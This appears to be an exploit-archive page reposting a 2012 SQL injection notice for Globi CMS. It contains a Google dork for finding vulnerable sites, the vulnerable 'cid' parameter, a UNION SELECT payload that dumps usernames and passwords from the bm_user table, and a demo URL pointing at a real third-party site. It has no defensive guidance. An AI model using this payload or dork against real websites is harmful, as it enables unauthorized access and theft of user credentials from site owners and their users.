Globi CMS SQL Injection

2012.09.11
Credit: Crim3R
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

<!-- ________ .__ __________________ \_ ___ \_______|__| _____ \_____ \______ \ / \ \/\_ __ \ |/ \ _(__ <| _/ \ \____| | \/ | Y Y \/ \ | \ \______ /|__| |__|__|_| /______ /____|_ / \/ \/ \/ \/ M3Mb3R OF AjaxTm --> ############################################################################ # Exploit Title: globi CMS SQL Injection Vulnerability # Google Dork: "Powered by globi" # Date: 9/7/2012 # Author: Ajax Security Team # Discovered By: Crim3R # Home: WwW.AjaxTm.CoM # Vendor Software: http://www.globi.ca/ # Version: All Version # Category:: webapps # Tested on: GNU/Linux Ubuntu - Windows Server - win7 ############################################################################ ================================== [+] cid parametr is Vulnerable to sqli [+] union+select+1,concat(username,0x3a,password),3,4,5,6+from+bm_user-- D3m0: http://www.bench-mark.ca/index.php?cid=169 ===============Crim3R@Att.Net========= [+] Greetz to All Ajaxtm Security Member Cair3x - HUrr!c4nE - E2MA3N - S3Ri0uS - iM4n - Sc0rpion - Daniyal devilzc0der - Dominator - Hossein.R1369

References:

http://www.globi.ca/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top